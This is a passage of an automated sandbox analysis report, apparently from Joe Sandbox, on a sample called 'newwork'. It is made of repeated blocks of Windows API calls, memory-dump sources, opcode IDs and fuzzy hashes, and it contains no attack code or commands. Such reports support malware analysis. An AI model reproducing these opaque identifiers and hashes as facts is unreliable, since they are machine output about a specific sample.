                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                                        • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                                        • API String ID: 2236967946-3182603685
                                                                                        • Opcode ID: 74e42c9c2b67fd5adc195c0662b506aaf6a0f02139eddaf5114ff9c1448628c8
                                                                                        • Instruction ID: 8776962154e21e4b1c8854f5ca4bcfaa90dd950cda3ad59ac2e2fede597431d6
                                                                                        • Opcode Fuzzy Hash: 74e42c9c2b67fd5adc195c0662b506aaf6a0f02139eddaf5114ff9c1448628c8
                                                                                        • Instruction Fuzzy Hash: 2B91D334608204DFEB15CF55E991F5ABBF5EB89704F2184BAE80497792C638AE04DB68
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F4B), ref: 00455E3C
                                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E42
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                        • API String ID: 1646373207-3712701948
                                                                                        • Opcode ID: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
                                                                                        • Instruction ID: d81c9a8c7c52065d28d66f53e81ce4f313aa74f068c2efe820cb9bfc493487ae
                                                                                        • Opcode Fuzzy Hash: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
                                                                                        • Instruction Fuzzy Hash: B0418671A04649AFCF01EFA5C8929EEB7B8EF48305F504567F804F7292D67C5E098B68
                                                                                        APIs
                                                                                        • IsIconic.USER32(?), ref: 00417D0F
                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
                                                                                        • GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
                                                                                        • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Placement$Iconic
                                                                                        • String ID: ,
                                                                                        • API String ID: 568898626-3772416878
                                                                                        • Opcode ID: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
                                                                                        • Instruction ID: e85585575f8c5a3e7823c55acc6b28d6d187d41511fbfc80546af44b70413e2d
                                                                                        • Opcode Fuzzy Hash: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
                                                                                        • Instruction Fuzzy Hash: 4C2112716042089BDF10EF69D8C1AEA77B8AF48314F05456AFD18DF346D678DD84CBA8
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001,00000000,0046433F), ref: 004641CD
                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 00464213
                                                                                        • FindNextFileA.KERNEL32(000000FF,?,00000000,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642C8
                                                                                        • FindClose.KERNEL32(000000FF,004642F3,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642E6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$CloseErrorFirstModeNext
                                                                                        • String ID:
                                                                                        • API String ID: 4011626565-0
                                                                                        • Opcode ID: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
                                                                                        • Instruction ID: 9d9184480f8630aada0b530c6bd54f2fc26159d28d851f3c8c43bf9f92f270d6
                                                                                        • Opcode Fuzzy Hash: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
                                                                                        • Instruction Fuzzy Hash: 77418370A00A18DBCF10EFA5DC959DEB7B8EB88305F5044AAF804A7341E7789E448E59
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001,00000000,00463E99), ref: 00463D0D
                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463D9C
                                                                                        • FindNextFileA.KERNEL32(000000FF,?,00000000,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E2E
                                                                                        • FindClose.KERNEL32(000000FF,00463E55,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E48
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$CloseErrorFirstModeNext
                                                                                        • String ID:
                                                                                        • API String ID: 4011626565-0
                                                                                        • Opcode ID: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
                                                                                        • Instruction ID: 85e7d80bc36d7b3e80fea797042c039a90a2821ca6a16b1e557570abf42aa49f
                                                                                        • Opcode Fuzzy Hash: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
                                                                                        • Instruction Fuzzy Hash: 3A41B770A00A589FCB11EF65CC45ADEB7B8EB88705F4044BAF404A7381E67D9F48CE59
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E956
                                                                                        • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E981
                                                                                        • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E98E
                                                                                        • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E996
                                                                                        • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E99C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                                        • String ID:
                                                                                        • API String ID: 1177325624-0
                                                                                        • Opcode ID: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
                                                                                        • Instruction ID: 661b18b1de4eb1238568a50ab540e77c3175952f9b14320adb6d96c9b056064d
                                                                                        • Opcode Fuzzy Hash: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
                                                                                        • Instruction Fuzzy Hash: 80F090B23A17207AF620B57A5C86F7F418CCB89B68F10423BBA04FF1D1D9A85D0555AD
                                                                                        APIs
                                                                                        • IsIconic.USER32(?), ref: 0048397A
                                                                                        • GetWindowLongA.USER32(00000000,000000F0), ref: 00483998
                                                                                        • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839BA
                                                                                        • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839CE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Show$IconicLong
                                                                                        • String ID:
                                                                                        • API String ID: 2754861897-0
                                                                                        • Opcode ID: 388bc32bc28a7c539796bab44a6ba9bad50612e2c7d9e5998850325d2fd9b569
                                                                                        • Instruction ID: 3cea9153c2b451a1fdc95e78a984a36fb28f479a74ffefb17a89e5a976076ef3
                                                                                        • Opcode Fuzzy Hash: 388bc32bc28a7c539796bab44a6ba9bad50612e2c7d9e5998850325d2fd9b569
                                                                                        • Instruction Fuzzy Hash: 160156B0705200ABEA00BF659CCBB5F22C55714745F44093BF4459B292CAADDA859B5C
                                                                                        APIs
                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,00462824), ref: 004627A8
                                                                                        • FindNextFileA.KERNEL32(000000FF,?,00000000,00462804,?,00000000,?,00000000,00462824), ref: 004627E4
                                                                                        • FindClose.KERNEL32(000000FF,0046280B,00462804,?,00000000,?,00000000,00462824), ref: 004627FE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                        • String ID:
                                                                                        • API String ID: 3541575487-0
                                                                                        • Opcode ID: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
                                                                                        • Instruction ID: e6acefadc91213b77ea930f6be1f86c6134c8588622ee3d3acab995ed1c325b6
                                                                                        • Opcode Fuzzy Hash: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
                                                                                        • Instruction Fuzzy Hash: 87210831904B08BECB11EB65CC41ACEB7ACDB49304F5084B7E808E32A1F6789E44CE69
                                                                                        APIs
                                                                                        • IsIconic.USER32(?), ref: 004241E4
                                                                                        • SetActiveWindow.USER32(?,?,?,0046CD53), ref: 004241F1
                                                                                          • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                          • Part of subcall function 00423B14: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021A25AC,0042420A,?,?,?,0046CD53), ref: 00423B4F
                                                                                        • SetFocus.USER32(00000000,?,?,?,0046CD53), ref: 0042421E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ActiveFocusIconicShow
                                                                                        • String ID:
                                                                                        • API String ID: 649377781-0
                                                                                        • Opcode ID: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
                                                                                        • Instruction ID: c953833529836f01456b8f788e47b4b7c36f7a841d6c6df07f57e62630513da6
                                                                                        • Opcode Fuzzy Hash: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
                                                                                        • Instruction Fuzzy Hash: 8CF030B170012097CB10BFAAA8C5B9676A8AB48344F5500BBBD05DF357CA7CDC018778
                                                                                        APIs
                                                                                        • IsIconic.USER32(?), ref: 00417D0F
                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
                                                                                        • GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
                                                                                        • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Placement$Iconic
                                                                                        • String ID:
                                                                                        • API String ID: 568898626-0
                                                                                        • Opcode ID: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
                                                                                        • Instruction ID: d9358ea7cd183770b33139a8ac7b7a0a70302bd2c01e5fc8313c3e2814ac7f2c
                                                                                        • Opcode Fuzzy Hash: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
                                                                                        • Instruction Fuzzy Hash: 33012C71204108ABDB10EE59D8C1EF673A8AF45724F154566FD19DF242D639ED8087A8
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CaptureIconic
                                                                                        • String ID:
                                                                                        • API String ID: 2277910766-0
                                                                                        • Opcode ID: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
                                                                                        • Instruction ID: 6cb7601519473143bf4e876ebf6758ccc8fc4fa751d6c6e0357a6193460a6b05
                                                                                        • Opcode Fuzzy Hash: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
                                                                                        • Instruction Fuzzy Hash: 0AF0A4723056425BD730AB2EC984AB762F69F84314B14403BE419CBFA1EB3CDCC08798
                                                                                        APIs
                                                                                        • IsIconic.USER32(?), ref: 0042419B
                                                                                          • Part of subcall function 00423A84: EnumWindows.USER32(00423A1C), ref: 00423AA8
                                                                                          • Part of subcall function 00423A84: GetWindow.USER32(?,00000003), ref: 00423ABD
                                                                                          • Part of subcall function 00423A84: GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
                                                                                          • Part of subcall function 00423A84: SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
                                                                                        • SetActiveWindow.USER32(?,?,?,00423D73,00000000,0042415C), ref: 004241AF
                                                                                          • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                                        • String ID:
                                                                                        • API String ID: 2671590913-0
                                                                                        • Opcode ID: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
                                                                                        • Instruction ID: ce5d4440ec1c13bcfda566247f28ea27228b22b89c70f7a48f218b5e8bc86154
                                                                                        • Opcode Fuzzy Hash: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
                                                                                        • Instruction Fuzzy Hash: 55E01AA070011087DB10AFAADCC8B9632A9BB48304F55017ABD49CF35BD63CC8608724
                                                                                        APIs
                                                                                        • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127D5), ref: 004127C3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: NtdllProc_Window
                                                                                        • String ID:
                                                                                        • API String ID: 4255912815-0
                                                                                        • Opcode ID: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
                                                                                        • Instruction ID: 2c049f03cfb376e3baa0368465928f91904f6d03483072bf0e6cb5f6a46bccc5
                                                                                        • Opcode Fuzzy Hash: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
                                                                                        • Instruction Fuzzy Hash: 4A5102357082048FD710DB6ADA80A9BF3E5EF98314B2082BBD814C77A1D7B8AD91C75D
                                                                                        APIs
                                                                                        • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00478C0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: NtdllProc_Window
                                                                                        • String ID:
                                                                                        • API String ID: 4255912815-0
                                                                                        • Opcode ID: 35b14883da97521222dd4ba63ab43259808bc2fdd283b26f07d3c05bbd11cdae
                                                                                        • Instruction ID: 8fc52e73ba06cc46e730b07d7f7f94568764801a7b8f51cd1014d1f63996c257
                                                                                        • Opcode Fuzzy Hash: 35b14883da97521222dd4ba63ab43259808bc2fdd283b26f07d3c05bbd11cdae
                                                                                        • Instruction Fuzzy Hash: EC4148B5A44104DFCB10CF99C6888AAB7F5FB49310B64C99AF848DB701D738EE45DB58
                                                                                        APIs
                                                                                        • ArcFourCrypt._ISCRYPT(?,?,?,0046DEA4,?,?,0046DEA4,00000000), ref: 0045D247
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CryptFour
                                                                                        • String ID:
                                                                                        • API String ID: 2153018856-0
                                                                                        • Opcode ID: 60613f318f2e56de1b1058283c26d55875caf569050bffc963c4b4a7e30f6a75
                                                                                        • Instruction ID: 5effe0378c810cd07e0217cdc1e7a72ed78fe315a0c34b067f2c35eeb24cdbba
                                                                                        • Opcode Fuzzy Hash: 60613f318f2e56de1b1058283c26d55875caf569050bffc963c4b4a7e30f6a75
                                                                                        • Instruction Fuzzy Hash: D0C09BF200420CBF650057D5ECC9C77B75CE6586547408126F7048210195726C104574
                                                                                        APIs
                                                                                        • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046DB14,?,0046DCF5), ref: 0045D25A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CryptFour
                                                                                        • String ID:
                                                                                        • API String ID: 2153018856-0
                                                                                        • Opcode ID: d774fb8793e7b9215c4f3788321c424c537fe54849dfeb2a35b58218e4d2cefe
                                                                                        • Instruction ID: 17600df93846144bfd8e61cd07b91608ca2a028cf3222f5d1774599e6ed580aa
                                                                                        • Opcode Fuzzy Hash: d774fb8793e7b9215c4f3788321c424c537fe54849dfeb2a35b58218e4d2cefe
                                                                                        • Instruction Fuzzy Hash: B7A002F0B80300BAFD2057F15E5EF26252C97D0F01F2084657306E90D085A56400853C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3557695338.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3557663419.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3557723561.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_10000000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
